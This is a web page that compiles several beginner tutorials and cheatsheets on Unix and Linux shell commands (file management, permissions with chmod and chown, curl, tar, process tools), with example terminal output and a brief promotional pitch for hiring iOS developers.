#chmod recursive directories and files

Unix Commands Every iOS Developer Should Know

When developing iOS applications, many developers focus primarily on Swift, Objective-C, and Xcode. However, a lesser-known yet powerful toolset that enhances productivity is Unix commands. Since macOS is a Unix-based operating system, understanding essential Unix commands can help iOS developers manage files, automate tasks, debug issues, and optimize workflows.

In this article, we’ll explore some of the most useful Unix commands every iOS developer should know.

Why Should iOS Developers Learn Unix?

Apple’s macOS is built on a Unix foundation, meaning that many system-level tasks can be efficiently handled using the terminal. Whether it’s managing files, running scripts, or automating processes, Unix commands can significantly enhance an iOS developer’s workflow. Some benefits include:

Better control over project files using the command line

Efficient debugging and log analysis

Automating repetitive tasks through scripting

Faster project setup and dependency management

Now, let’s dive into the must-know Unix commands for iOS development.

1. Navigating the File System

cd – Change Directory

The cd command lets you move between directories:

```bash
cd ~/Documents/MyiOSProject
```

This moves you into the MyiOSProject folder inside Documents.

ls – List Directory Contents

To view files and folders in the current directory:

```bash
ls
```

To display a detailed (long-format) listing that also includes hidden files, use:

```bash
ls -la
```

pwd – Print Working Directory

If you ever need to check your current directory:

```bash
pwd
```

2. Managing Files and Directories

mkdir – Create a New Directory

To create a new folder inside your project:

```bash
mkdir Assets
```

rm – Remove Files or Directories

To delete a file:

```bash
rm old_file.txt
```

To delete a folder and its contents:

```bash
rm -rf OldProject
```

⚠ Warning: -r deletes recursively and -f skips every confirmation prompt, so rm -rf removes files permanently; they do not go to the Trash.

cp – Copy Files or Directories

To copy a file from one location to another:

```bash
cp file.txt Backup/
```

To copy an entire folder:

```bash
cp -r Assets Assets_Backup
```

mv – Move or Rename Files

Rename a file:

```bash
mv old_name.txt new_name.txt
```

Move a file to another directory:

```bash
mv file.txt Documents/
```
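Combined, mkdir, cp, mv and rm support a cautious "back up first, delete last" routine. The sketch below runs inside a throwaway temporary directory; Assets, Assets_Backup and OldProject are placeholder names, not anything Xcode requires.

```bash
workdir=$(mktemp -d)
cd "$workdir" || exit 1

mkdir -p Assets OldProject                # -p: no error if they already exist
echo "icon" > Assets/icon.txt
echo "legacy" > OldProject/notes.txt

cp -R Assets Assets_Backup                # back up the whole folder first
mv Assets/icon.txt Assets/app_icon.txt    # rename a file in place
mv OldProject/notes.txt Assets_Backup/    # move a file into another folder
rm -r OldProject                          # delete last (add -i to confirm each file)

ls -R                                     # show what is left
```

Adding -i to rm (or cp and mv) makes each step ask before deleting or overwriting, which is a good default while you are still learning the commands.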

3. Viewing and Editing Files

cat – Display File Contents

To quickly view a file’s content:

```bash
cat README.md
```

nano – Edit Files in Terminal

To open a file for editing:

```bash
nano config.json
```

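Press Ctrl + X to exit; if there are unsaved changes, nano asks whether to save them (press Y, then Enter). Ctrl + O saves without exiting.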

grep – Search for Text in Files

To search for a specific word inside files:

```bash
grep "error" logs.txt
```

To search recursively in all files within a directory:

```bash
grep -r "TODO" .
```
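In an iOS project you often want to restrict a search to Swift sources. A minimal sketch, assuming a grep that supports --include (GNU grep and the BSD grep shipped with macOS both do); the files it creates are hypothetical.

```bash
workdir=$(mktemp -d)
mkdir -p "$workdir/Sources"
printf 'let a = 1 // TODO: rename\nprint(a)\n' > "$workdir/Sources/A.swift"
printf '// TODO: add tests\n' > "$workdir/Sources/B.swift"
printf 'TODO in a text file\n' > "$workdir/notes.txt"

cd "$workdir" || exit 1
# -r: recurse, -n: show line numbers, --include: only search *.swift files
grep -rn --include='*.swift' "TODO" .

# wc -l counts the matching lines; tr strips the padding macOS wc adds
todo_count=$(grep -r --include='*.swift' "TODO" . | wc -l | tr -d ' ')
echo "Swift TODOs: $todo_count"
```

The TODO in notes.txt is skipped because of --include; add -i if you also want to match todo in lowercase.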

4. Process and System Management

ps – Check Running Processes

To view running processes:

```bash
ps aux
```

kill – Terminate a Process

To kill a specific process, find its Process ID (PID) and use:

```bash
kill PID
```

For example, if Xcode is unresponsive, find its PID and then kill it:

```bash
ps aux | grep Xcode
kill 1234  # Replace 1234 with the actual PID
```
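To practice without risking Xcode, you can start a harmless background job and kill it instead. In this sketch sleep stands in for an unresponsive app, $! holds the PID of the most recent background job, and kill -0 sends no signal at all; it only checks whether the process still exists.

```bash
sleep 300 &                 # stand-in for a hung process
pid=$!                      # PID of the background job we just started
echo "started sleep with PID $pid"

kill "$pid"                 # sends TERM (signal 15) by default
wait "$pid" 2>/dev/null     # reap the job; its status is 128 + 15 = 143

if kill -0 "$pid" 2>/dev/null; then
  echo "process $pid is still running"
else
  echo "process $pid has exited"
fi
```

On a real Mac, pgrep -x Xcode prints Xcode's PID directly, which also avoids the grep process itself showing up in the output of ps aux | grep Xcode.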

top – Monitor System Performance

To check CPU and memory usage:

```bash
top
```

5. Automating Tasks with Unix Commands

chmod – Modify File Permissions

If a script isn’t executable, change its permissions:

```bash
chmod +x script.sh
```
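Here is a small sketch of the whole cycle: create a script, see it refuse to run, make it executable, and run it again. The script name and its echo line are placeholders.

```bash
workdir=$(mktemp -d)
script="$workdir/script.sh"          # hypothetical script

cat > "$script" <<'EOF'
#!/bin/sh
echo "build finished"
EOF

"$script" 2>/dev/null || echo "not executable yet (Permission denied)"
chmod +x "$script"                   # add execute permission (respecting the umask)
ls -l "$script"                      # the mode now starts with -rwx
output=$("$script")
echo "$output"
```

Running it as sh script.sh also works without the execute bit, because then the shell reads the file rather than the system executing it directly.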

crontab – Schedule Automated Tasks

To schedule a script to run every day at midnight:

```bash
crontab -e
```

Then add:

```
0 0 * * * /path/to/script.sh
```

find – Search for Files

To locate a file inside a project directory:

```bash
find . -name "Main.swift"
```

6. Git and Version Control with Unix Commands

Most iOS projects use Git for version control. Here are some useful Git commands:

Initialize a Git Repository

```bash
git init
```

Clone a Repository

```bash
git clone https://github.com/user/repo.git
```

Check Status and Commit Changes

```bash
git status
git add .
git commit -m "Initial commit"
```

Push Changes to a Repository

```bash
git push origin main
```

Final Thoughts

Mastering Unix commands can greatly improve an iOS developer’s efficiency, allowing them to navigate projects faster, automate tasks, and debug applications effectively. Whether you’re managing files, monitoring system performance, or using Git, the command line is an essential tool for every iOS developer.

If you're looking to hire iOS developers with deep technical expertise, partnering with an experienced iOS app development company can streamline your project and ensure high-quality development.

Want expert iOS development services? Hire iOS Developers today and build next-level apps!

10 Essential Linux Commands Every User Should Know

Linux is a popular operating system known for its stability, security, and flexibility. It is widely used in servers, supercomputers, and embedded devices. Linux commands are an essential part of the operating system, allowing users to perform various tasks and manage files, directories, and system settings. In this blog post, we will discuss the 10 essential Linux commands every user should know.

ls: The ‘ls’ command is used to list the files and directories in the current directory. It can display the file names, sizes, and modification dates. The command can also be used with various options to display hidden files, sort files by size or modification date, and more.

cd: The ‘cd’ command is used to change the current directory. It can be used to navigate to a specific directory or to move up and down the directory hierarchy. The command can also be used with relative or absolute paths to navigate to a specific location.

cp: The ‘cp’ command is used to copy files and directories. It can be used to copy a single file, a group of files, or an entire directory. The command can also be used with various options to preserve file attributes (-p), copy directories recursively (-R), prompt before overwriting existing files (-i), and more.

mv: The ‘mv’ command is used to move or rename files and directories. It can be used to move a file or directory to a new location or to rename a file or directory. The command can also be used with various options to prompt before overwriting (-i), never overwrite existing files (-n), or overwrite without prompting (-f).

rm: The ‘rm’ command is used to remove files and directories. It can be used to delete a single file, a group of files, or an entire directory. The command can also be used with various options to delete non-empty directories recursively (-r), skip confirmation prompts (-f), ask before each removal (-i), and more.

mkdir: The ‘mkdir’ command is used to create new directories. It can be used to create a single directory or a group of directories. The command can also be used with various options to set specific permissions on the new directories (-m), create any missing parent directories (-p), and more.

rmdir: The ‘rmdir’ command is used to remove empty directories. It can be used to remove a single directory or a group of directories. It refuses to delete a directory that still contains files (use rm -r for that), and with -p it also removes each parent directory in the path as it becomes empty.

chmod: The ‘chmod’ command is used to change the permissions of files and directories. It can be used to change the read, write, and execute permissions for the owner, group, and others. Permissions can be given as a numeric (octal) mode such as 755 or a symbolic mode such as u+x, and the -R option applies the change recursively.

chown: The ‘chown’ command is used to change the ownership of files and directories. It can be used to change the owner and group of a file or directory. The command can also be used with various options to change ownership recursively, change ownership based on a user or group ID, and more.

chgrp: The ‘chgrp’ command is used to change the group ownership of files and directories. It can be used to change the group ownership of a file or directory. The command can also be used with various options to change group ownership recursively, change group ownership based on a group name, and more.
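The difference between rmdir and rm -r, and the -p and -m options of mkdir, are easy to check in a scratch directory. A minimal sketch; all paths are hypothetical.

```bash
workdir=$(mktemp -d)
cd "$workdir" || exit 1

mkdir -p projects/app/src          # -p creates the missing parent directories
mkdir -m 700 private               # -m sets the new directory's mode directly
ls -ld private                     # drwx------

touch projects/app/src/main.c
rmdir projects/app/src 2>/dev/null || echo "rmdir refuses: directory not empty"

rm projects/app/src/main.c
rmdir -p projects/app/src          # removes src, then app, then projects
ls
```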

Conclusion: These 10 essential Linux commands are the foundation of Linux command-line management. By mastering these commands, users can perform various tasks, manage files and directories, and manage system settings. These commands are versatile and can be used in various situations, making them essential for any Linux user.

WHAT IS CHMOD AND CHMOD CALCULATOR

Linux and Unix operating systems have a set of rules that control file access: who can access a particular file and what they are allowed to do with it. These access rules are known as file permissions. The command that changes file permissions is chmod, short for ‘change mode.’ On Linux and Unix-like systems, chmod is both a command and a system call. It changes the permissions of files and directories, and the permissions are set separately for the user (owner), the group, and others.

Try right now: http://www.convertforfree.com/chmod-calculator/
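A chmod calculator essentially adds up r = 4, w = 2 and x = 1 for each of the user, group and others triplets. The hypothetical perm_to_octal function below is a minimal bash sketch of that arithmetic, not the linked tool's implementation.

```bash
# Convert a symbolic permission string such as rwxr-xr-- to octal (754).
perm_to_octal() {
  local perms=$1 result="" digit c i j
  for i in 0 3 6; do                 # user, group, others
    digit=0
    for ((j = 0; j < 3; j++)); do
      c=${perms:i+j:1}               # one character of the current triplet
      case $c in
        r) digit=$((digit + 4)) ;;
        w) digit=$((digit + 2)) ;;
        x) digit=$((digit + 1)) ;;
      esac
    done
    result+=$digit
  done
  printf '%s\n' "$result"
}

perm_to_octal rwxr-xr--   # 754
perm_to_octal rw-r--r--   # 644
```

The setuid, setgid and sticky bits (the optional leading fourth digit) are not handled by this sketch.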

UNIX terminal command cheatsheet

I’m spending more time with Linux these days, which means heavy terminal use. Since it is such an important part of using the system correctly, I wanted to keep a running list of commonly used commands for reference (this list doesn't include many flags, for instance). I will probably add to this as I do more things, but these seem to be the biggest foundational ones.

pwd

pwd prints the name of the working directory

cd

cd takes a directory name as an argument, and switches into that directory

ls

ls lists all files and directories in the working directory

cp

cp copies files or directories. cp file1 file2 will copy file1 to file2

cd ..

To move up one directory, use cd ..

mkdir

mkdir takes in a directory name as an argument, and then creates a new directory in the current working directory.

mv

To move a file into a directory, use mv with the source file as the first argument and the destination directory as the second argument

cat

cat allows us to create single or multiple files, view the contents of files, concatenate files, and redirect output to the terminal or to files.

touch

touch creates a new, empty file. It takes a file name (or path) as an argument; if the file already exists, touch only updates its modification time. For example, touch 2014/dec/keyboard.txt creates a new file named keyboard.txt inside the 2014/dec/ directory.

grep

grep stands for “global regular expression print”. It searches files for lines that match a pattern and returns the results. By default it is case sensitive; add -i to ignore case.

rm

rm deletes files

rm -r

rm -r removes a directory recursively ...SCARY as hell.

man

man command shows the manual for the specified command

chmod

chmod ugo file changes permissions of file to ugo - u is the user's permissions, g is the group's permissions, and o is everyone else's permissions. The values of u, g, and o can be any number between 0 and 7.

>>

>> takes the standard output of the command on the left and appends (adds) it to the file on the right. Example: cat glaciers.txt >> rivers.txt

<

< takes the standard input from the file on the right and inputs it into the program on the left. Example: cat < lakes.txt

|

| is a “pipe”. The | takes the standard output of the command on the left, and pipes it as standard input to the command on the right. You can think of this as “command to command” redirection. Example: cat volcanoes.txt | wc

src: http://cheatsheetworld.com/programming/unix-linux-cheat-sheet/
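The redirection operators can be tried together on small files. The file names follow the cheatsheet's examples; their contents here are made up.

```bash
workdir=$(mktemp -d)
cd "$workdir" || exit 1

printf 'Aletsch\nVatnajokull\n' > glaciers.txt   # > creates or overwrites
printf 'Rhine\n' > rivers.txt

cat glaciers.txt >> rivers.txt    # >> appends, so rivers.txt now has 3 lines
touch lakes.txt                   # an empty file

wc -l < rivers.txt                # < feeds the file to wc on standard input
cat rivers.txt | wc -l            # | pipes cat's output into wc
lines=$(wc -l < rivers.txt | tr -d ' ')
```

Using > where you meant >> is a classic mistake: it silently replaces the file instead of adding to it.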

1) ls

Need to figure out what is in a directory? ls is your friend. It will list out the contents of a directory and has a number of flags to help control how those items are displayed. Since the default ls doesn't display entries that begin with a ., you can use ls -a to make sure to include those entries as well.

```
nyxtom@enceladus$ ls -a
./          README.md          _dir_colors  _tern-project  _vimrc
../         _alacritty-theme/  _gitconfig   _tmux/         alacritty-colorscheme*
.git/       _alacritty.yml     _profile     _tmux.conf     imgcat.sh*
.gitignore  _bashrc            _terminal/   _vim/          install.sh*
```

Need it in a single column (one entry per line)? Use ls -1. Need a long format with size, permissions, and timestamps? Use ls -l. Need those entries sorted by modification time? Use ls -l -t. Need to list them recursively? Use ls -R. Want to sort by file size? Use ls -S.

2) cat

Need to output the contents of a file? Use cat! Bonus: use cat -n to number the lines.

```
nyxtom@enceladus$ cat -n -s _dir_colors
     1  .red 00;31
     2  .green 00;32
     3  .yellow 00;33
     4  .blue 00;34
     5  .magenta 00;35
     6  .cyan 00;36
     7  .white 00;37
     8  .redb 01;31
     9  .greenb 01;32
```

3) less/more

Are you finding that "cat-ing" a file is causing your terminal to scroll too fast? Use less to fix that problem. But wait, what about more? less is actually based on more. Early versions of more were unable to scroll backward through a file. In any case, less has a nice ability to scroll through the contents of a file or output with space/down/up/page keys. Use q to exit.

Need line numbers? use less -N

Need to search while in less? Use /wordshere to search.

Once you're searching use n to go to the next result, and N for the previous result.

Want to open up less with search already? Use less -pwordshere file.txt

Too many blank lines bothering you? less -s squeezes runs of blank lines into one.

Multiple files, what!? less file1.txt file2.txt

Go to the next file with :n and to the previous file with :p

Need to pipe some log output or the results of a curl? Use curl dev.to | less

Less has bookmarks? Yep. Drop a marker for the current top line with m, then hit any letter as the bookmark name, like a. To go back, hit ' (the apostrophe key) and the bookmark letter (in this case a).

Want to drop into your default editor from less right where you are currently at and return back when you're done? Use v and your default terminal editor will open up at the right spot. Then once you've quit/saved in that editor you will be right back where you were before. 😎 Awesome! 🎉

4) curl

Curl is another essential tool if you need to do just about any type of protocol request. Here is a small fraction of ways you can interact with curl.

GET curl https://dev.to/

Output to a file curl -o output.html https://dev.to/

POST curl -X POST -H "Content-Type: application/json" -d '{"name":"tom"}' http://localhost:8080

BASIC AUTH curl -u username:password http://localhost:8080

Read the request body from standard input (type it into cat, then press Ctrl-D) cat | curl -H 'Content-Type: application/json' http://localhost:8080 -d @-

HEAD curl -I dev.to

Follow Redirects curl -I -L dev.to

Pass a client certificate and key, skip server verification curl --cert <cert-file> --key <key-file> --insecure https://example.com

5) man

If you are stuck understanding what a command does, or need its documentation, use man! It's literally the manual, and it works for just about every built-in command. It even works on itself:

```
$ man man
NAME
       man - format and display the on-line manual pages

SYNOPSIS
       man [-acdfFhkKtwW] [--path] [-m system] [-p string] [-C config_file]
       [-M pathlist] [-P pager] [-B browser] [-H htmlpager] [-S section_list]
       [section] name ...

DESCRIPTION
       man formats and displays the on-line manual pages. If you specify
       section, man only looks in that section of the manual. name is
       normally the name of the manual page, which is typically the name of
       a command, function, or file. However, if name contains a slash (/)
       then man interprets it as a file specification, so that you can do
       man ./foo.5 or even man /cd/foo/bar.1.gz.

       See below for a description of where man looks for the manual page
       files.

MANUAL SECTIONS
       The standard sections of the manual include:

       1      User Commands
       2      System Calls
       3      C Library Functions
       4      Devices and Special Files
       5      File Formats and Conventions
       6      Games et. Al.
       7      Miscellanea
       8      System Administration tools and Deamons

       Distributions customize the manual section to their specifics, which
       often include additional sections.
```

6) alias

If you ever need to setup a short command name to execute a script or some complicated git command for instance, then use alias.

```bash
alias st="git status"
alias branches="git branch -a --no-merged"
alias imgcat="~/dotfiles/imgcat.sh"
```

Bonus: add these to your ~/.bashrc to execute these when your shell starts up!

7) echo

The "hello world" of any terminal is echo: echo "hello world". You can include environment variables, as in echo "Hello $USER", and even command substitutions, as in echo "Today is $(date)".

8) sed

sed is a "stream editor": it reads some input, modifies it, and writes the result out. Here are a few ways you can use it:

Text substitutions: echo 'Hello world!' | sed s/world/tom/

Selections: sed -n '1,4p' _bashrc (-n is quiet mode, which suppresses the automatic printing of every line; 1,4p prints lines 1-4)

Multiple selections: sed -n -e '1,4p' -e '8,10p' _bashrc

Every Nth line: sed -n '1~2p' _bashrc (first~step is a GNU sed extension: starting at line 1, print every 2nd line)

Search all/replace all: sed -n 's/world/tom/gp' (g replaces every match on a line instead of only the first; together with -n, p prints only the lines where a substitution was made)

NOTE: sed implementations differ between systems (for example, GNU sed on Linux and BSD sed on macOS), so some flags and extensions might be unavailable. Take a look at man sed for more info.
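Because 1~2p only works in GNU sed, a portable alternative is handy when the same script has to run on both Linux and macOS. The sketch below builds a hypothetical ten-line sample file and sticks to POSIX sed.

```bash
workdir=$(mktemp -d)
sample="$workdir/sample.txt"
for n in 1 2 3 4 5 6 7 8 9 10; do echo "line $n: hello world"; done > "$sample"

echo 'Hello world!' | sed 's/world/tom/'      # Hello tom!
sed -n '1,4p' "$sample"                       # lines 1-4
sed -n -e '1,4p' -e '8,10p' "$sample"         # lines 1-4 and 8-10
sed -n 'p;n' "$sample"                        # odd lines (1, 3, 5, ...), like GNU 1~2p
sed -n 's/world/tom/gp' "$sample"             # only lines where a substitution happened

odd_lines=$(sed -n 'p;n' "$sample" | wc -l | tr -d ' ')
```

'p;n' works because p prints the current line and n then reads the next line without printing it (thanks to -n), so every second line is skipped.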



9) tar

Need to create an archive of a number of files? Use tar. Don't worry, you'll remember these flags soon enough!

-c create

-v verbose

-f file name

This would look like:

tar -cvf archive.tar files/

By default, tar will create an uncompressed archive unless you tell it to use a specific compression algorithm.

-z gzip (decent compression, reasonable speed) (.gz)

-j bzip2 (better compression, slower) (*.bz2)

tar -czvf archive.tar.gz files/

Extraction is done with:

-x extract

The same compression and verbose flags apply when extracting:

```bash
# extract, verbose, gzip decompress, filename
tar -xvzf archive.tar.gz
```
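A full create, list and extract round trip looks like this, assuming a tar that supports -z (GNU tar and the bsdtar shipped with macOS both do); files/ and restored/ are placeholder directories.

```bash
workdir=$(mktemp -d)
cd "$workdir" || exit 1
mkdir -p files restored
echo "hello" > files/a.txt
echo "world" > files/b.txt

tar -czvf archive.tar.gz files/        # f is last in the bundle: the next word is the archive name
tar -tzf archive.tar.gz                # -t lists the contents without extracting
tar -xzvf archive.tar.gz -C restored   # -C extracts into another directory
```

Putting f anywhere but last (as in -cvfz) makes tar treat the following letter-group or word as the archive name, which is the usual cause of oddly named archives.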

10) cd

Change directories. Not much to it! cd ../../, cd ~, cd files/, cd $HOME

11) head

head [-n count | -c bytes] [file ...]: head is a filter command that displays the first count lines (-n) or bytes (-c) of each of the specified files, or of the standard input if no files are specified. If count is omitted, it defaults to 10.

If more than a single file is specified, each file is preceded by a header consisting of the string "==> XXX <==" where XXX is the name of the file.

head -n 10 ~/dotfiles/_bashrc

12) mkdir

mkdir creates the directories named as operands, in the order specified, using mode rwxrwxrwx (0777) as modified by the current umask. It accepts the following options:

-m mode: Set the file permission bits of the final directory created (mode can be in any format accepted by chmod)

-p Create intermediary directories as required (if not specified then the full path prefix must already exist)

-v Verbose when creating directories

13) rm

rm removes the non-directory files specified on the command line. If a file's permissions do not permit writing and standard input is a terminal, the user is prompted for confirmation.

A few options of rm can be quite useful:

-d remove directories as well as files

-r -R Remove the file hierarchy rooted in each file, this implies the -d option.

-i Request confirmation before attempting to remove each file

-f Remove files without prompting for confirmation, regardless of their permissions. If a file does not exist, do not display a diagnostic message or report an error

-v verbose output

14) mv

mv renames the file named by the source to the destination path. mv also moves each file named by a source to the destination. Use the following options:

-f Do not prompt for confirmation before overwriting

-i Cause mv to write a prompt to stderr before moving a file that would overwrite an existing file

-n Do not overwrite an existing file (overrides -i and -f)

-v verbose output
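The difference between -n and a plain mv matters when the destination already exists. A sketch with two hypothetical files:

```bash
workdir=$(mktemp -d)
cd "$workdir" || exit 1
echo "new draft" > draft.txt
echo "published" > final.txt

mv -n draft.txt final.txt || true   # -n: final.txt exists, so nothing is moved
kept=$(cat final.txt)
echo "after mv -n: $kept"           # still "published"; draft.txt is untouched

mv -v draft.txt final.txt           # without -n (or -i) the existing file is replaced
cat final.txt                       # now "new draft"
```

The || true is there because newer GNU versions of mv may report a non-zero status when -n skips a file.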

15) cp

Copies the contents of the source to the target

-L With -R, all symbolic links are followed

-P With -R, no symbolic links are followed (this is the default)

-R if source designates a directory, copy the directory and entire subtree (created directories have the same mode as the source directory, unmodified by the process umask)

16) ps

Display the header line, followed by lines containing information about all of your processes that have controlling terminals. Various options can be used to control what is displayed.

-A Display information about other users' processes, including those without controlling terminals

-a Display information about other users' processes as well as your own (skip any processes without controlling terminal)

-c Change command column to contain just exec name

-f Display uid, pid, parent pid, recent CPU usage, start time, tty, elapsed CPU time, and command. Combined with -u, the user name is shown instead of the uid.

-h Repeat header as often as necessary (one per page)

-p Display information about processes matching the specified process IDs (ps -p 8040)

-u Display processes belonging to the specified user (ps -u tom)

-r Sort by CPU usage

```
  UID   PID  PPID  C STIME   TTY      TIME CMD                     F PRI NI       SZ    RSS WCHAN S  ADDR
  501 97993 78315  0 5:28PM  ??  134:30.10 Figma Beta Helpe     4004  31  0 28675292 316556 -     R     0
   88   292     1  0 14Aug20 ??  372:58.39 WindowServer         410c  79  0  8077052  81984 -     Ss    0
  501 78315     1  0 Thu04PM ??   17:55.75 Figma Beta        1004084  46  0  5727912 109596 -     S     0
  501 78377 78315  0 Thu04PM ??   22:16.66 Figma Beta Helpe     4004  31  0  5893304  59376 -     S     0
  501 70984 70915  0 Wed02PM ??    8:58.36 Spotify Helper (     4004  31  0  9149416 294276 -     S     0
  202   266     1  0 14Aug20 ??  108:51.87 coreaudiod           4004  97  0  4394220   6960 -     Ss    0
  501 70979 70915  0 Wed02PM ??    2:09.53 Spotify Helper (     4004  31  0  4767800  49764 -     S     0
  501 97869 78315  0 5:28PM  ??    0:32.51 Figma Beta Helpe     4004  31  0  5324624  81000 -     S     0
  501 70915     1  0 Wed02PM ??    9:53.82 Spotify           10040c4  97  0  5382856  92580 -     S     0
```

17) tail

Similar to head, tail will display the contents of a file or input starting at the given options:

tail -f /var/log/web.log Keep the output open when the end of the file is reached and wait for more data to be appended; commonly used to watch logs. (Use -F to keep following when the file is renamed or rotated)

tail -n 100 /var/log/web.log Number of lines

tail -r Input is displayed in reverse order

tail -c 100 Use a number of bytes instead of lines (on macOS, -b counts 512-byte blocks)
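A quick way to compare head and tail is to feed them numbered lines generated with seq (available on both Linux and macOS). The log path is hypothetical.

```bash
workdir=$(mktemp -d)
log="$workdir/web.log"     # hypothetical log file
seq 1 100 > "$log"

head -n 3 "$log"           # 1 2 3
tail -n 3 "$log"           # 98 99 100
tail -c 4 "$log"           # last 4 bytes: "100" plus the trailing newline
tail -n +98 "$log"         # +N starts at line N instead of counting from the end

# Follow the file briefly, append a line, then stop the background tail.
tail -f "$log" &
tail_pid=$!
echo 101 >> "$log"
sleep 1
kill "$tail_pid"
wait "$tail_pid" 2>/dev/null
```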

18) kill

Sends a signal to the processes specified by their PIDs

Commonly used signals include:

1 HUP (hang up)

2 INT (interrupt)

3 QUIT (quit)

6 ABRT (abort)

9 KILL (non-catchable, non-ignorable kill)

14 ALRM (alarm clock)

15 TERM (software termination signal)

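You will often see kill -9 pid. Because KILL cannot be caught, the process gets no chance to clean up, so it is worth trying the default TERM signal (a plain kill pid) first. Find the process with ps or top!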
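The reason to try TERM before KILL is that a process can catch TERM and clean up, whereas KILL cannot be caught at all. In this minimal sketch a hypothetical worker, written as an inline bash script, traps TERM, writes a note to a file, and exits normally.

```bash
workdir=$(mktemp -d)
marker="$workdir/cleanup.log"

# Hypothetical worker: on TERM it writes a note to $1 and exits with status 0.
bash -c 'trap "echo cleaned up > \"$1\"; exit 0" TERM
         while :; do sleep 0.2; done' _ "$marker" &
worker=$!

sleep 1                 # give the worker time to install its trap
kill "$worker"          # same as kill -15 or kill -TERM
wait "$worker"
status=$?
echo "worker exit status: $status"   # 0, because the trap ran
cat "$marker"
```

Sending kill -9 to the same worker would end it immediately: the trap would never run and cleanup.log would not be written.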

19) top

Need some realtime display of the running processes? Use top for this!

```
Processes: 517 total, 3 running, 3 stuck, 511 sleeping, 3013 threads    16:16:07
Load Avg: 2.54, 2.63, 2.57  CPU usage: 12.50% user, 5.66% sys, 81.83% idle
SharedLibs: 210M resident, 47M data, 17M linkedit.
MemRegions: 153322 total, 5523M resident, 164M private, 2621M shared.
PhysMem: 16G used (2948M wired), 431M unused.
VM: 2539G vsize, 1995M framework vsize, 14732095(0) swapins, 17624720(0) swapouts.
Networks: packets: 81107619/74G in, 103172624/63G out.
Disks: 44557301/463G read, 15432059/228G written.

PID    COMMAND      %CPU TIME     #TH   #WQ #PORTS MEM    PURG CMPRS PGRP  PPID  STATE    BOOSTS %CPU_ME %CPU_OTHRS UID FAULTS   COW   MSGSENT     MSGRECV     SYSBSD
97993  Figma Beta H 53.0 02:19:46 26    1   271    347M+  0B   109M  78315 78315 sleeping *0[1]  0.00000 0.00000    501 5042481+ 5175  29897392+   8417371+    19506598+
62329  Slack Helper 21.6 05:18.63 20    1   165+   123M-  0B   27M   62322 62322 sleeping *0[4]  0.00000 0.00000    501 2124802+ 13816 813744+     435614+     1492014+
0      kernel_task  9.6  07:47:25 263/8 0   0      106M   0B   0B    0     0     running   0[0]  0.00000 0.00000    0   559072   0     1115136682+ 1057488639+ 0
60459  top          5.5  00:00.65 1/1   0   25     5544K+ 0B   0B    60459 83119 running  *0[1]  0.00000 0.00000    0   3853+    104   406329+     203153+     8800+
```

20) and 21) chmod, chown

File permissions are likely a very typical issue you will run into. Judging from the number of search results for "permission not allowed" and other variations, it is very useful to understand these two commands and how they work together.

When you list files out, the permission flags will denote things like:

-rwxrwxrwx

The first character denotes the type: - is a regular file and d is a directory. The next nine characters are three sets of permissions: 1) the owner's, 2) the group's, 3) everyone else's (others). r is read, w is write, x is execute.

Typically, chmod will be used with the numeric version of these permissions as follows:

0: No permission

1: Execute permission

2: Write permission

3: Write and execute permissions

4: Read permission

5: Read and execute permissions

6: Read and write permissions

7: Read, write and execute permissions

So if you wanted to give read/write/execute to owner, but only read permissions to the group and others it would be:

chmod 744 file.txt

With chown you can change the owner and the group of a file, for example chown $USER: file.txt (this makes your current user the owner; on GNU systems the trailing colon also sets the group to that user's login group).
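A related pitfall is changing permissions recursively. chmod -R applies one mode to files and directories alike, yet directories need x to be entered while ordinary files usually should not be executable. A common pattern, sketched here on a hypothetical site/ tree, uses find to treat the two types separately.

```bash
workdir=$(mktemp -d)
mkdir -p "$workdir/site/css"
echo "body {}" > "$workdir/site/css/style.css"
echo "<h1>hi</h1>" > "$workdir/site/index.html"

# Directories: 755 (rwxr-xr-x) so everyone can list and enter them.
find "$workdir/site" -type d -exec chmod 755 {} +
# Regular files: 644 (rw-r--r--), readable but not executable.
find "$workdir/site" -type f -exec chmod 644 {} +

ls -lR "$workdir/site"

# Symbolic alternative: capital X adds execute only to directories
# (and to files that already have an execute bit set).
chmod -R u=rwX,go=rX "$workdir/site"
```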

22) grep

Grep lets you search any given input, selecting lines that match various patterns. Usually grep is used for simple patterns and basic regular expressions, while egrep (equivalent to grep -E) is typically used for extended regular expressions.

If you specify --color, matches are highlighted in the output. Combine it with -n to include line numbers.

```
grep --color -n "imgcat" ~/dotfiles/_bashrc
251:alias imgcat='~/dotfiles/imgcat.sh'
```

23) find

Recursively descend the directory tree for each path listed and evaluate an expression. Find has a lot of variations and options, but don't let that scare you. The most typical usage might be:

find . -name "*.c" -print print out files where the name ends with .c

find . \! -name "*.c" -print print out files where the name does not end in .c

find . -type f -name "test*" -print print out only regular files (no directories) whose names start with "test"

find . -maxdepth 2 -name "*.c" -print only descend 2 levels deep in the directories
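These find expressions can be checked against a small scratch tree; the file names are placeholders. Note that -name matches the whole file name, so a prefix search needs a wildcard such as "test*".

```bash
workdir=$(mktemp -d)
cd "$workdir" || exit 1
mkdir -p src/lib/deep
touch src/main.c src/lib/util.c src/lib/deep/old.c src/README.md test_main.c test

find . -name "*.c" -print                 # every .c file, at any depth
find . \! -name "*.c" -type f -print      # regular files that are not .c files
find . -type f -name "test*" -print       # regular files whose names start with test
find . -maxdepth 2 -name "*.c" -print     # only ./test_main.c and ./src/main.c

shallow=$(find . -maxdepth 2 -name "*.c" | wc -l | tr -d ' ')
```

GNU find prints a warning when -maxdepth appears after tests such as -name, so placing it first keeps the command quiet on Linux as well as macOS.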

24) ping

Among many network diagnostic tools from lsof to nc, you can't go wrong with ping. ping simply sends ICMP ECHO_REQUEST packets to network hosts. Many servers disable ICMP responses, but in any case, you can use it in a number of useful ways.

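Specify a time-to-live for multicast packets with -T (on macOS; -m sets it for ordinary outgoing packets, and Linux uses -t)

Set a timeout in seconds with -t (on macOS; Linux uses -w for a deadline)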

-c Stop sending and receiving after count packets.

-s Specify the number of data bytes to send

```
PING dev.to (151.101.130.217): 56 data bytes
64 bytes from 151.101.130.217: icmp_seq=0 ttl=58 time=17.338 ms
64 bytes from 151.101.130.217: icmp_seq=1 ttl=58 time=32.732 ms
64 bytes from 151.101.130.217: icmp_seq=2 ttl=58 time=14.288 ms
64 bytes from 151.101.130.217: icmp_seq=3 ttl=58 time=15.166 ms
64 bytes from 151.101.130.217: icmp_seq=4 ttl=58 time=16.465 ms

--- dev.to ping statistics ---
5 packets transmitted, 5 packets received, 0.0% packet loss
round-trip min/avg/max/stddev = 14.288/19.198/32.732/6.848 ms
```



25) sudo

sudo runs a command as the superuser (root), or as another user, as permitted by the security policy. You need it for actions that require those privileges:

sudo ls /usr/local/protected

Conclusion

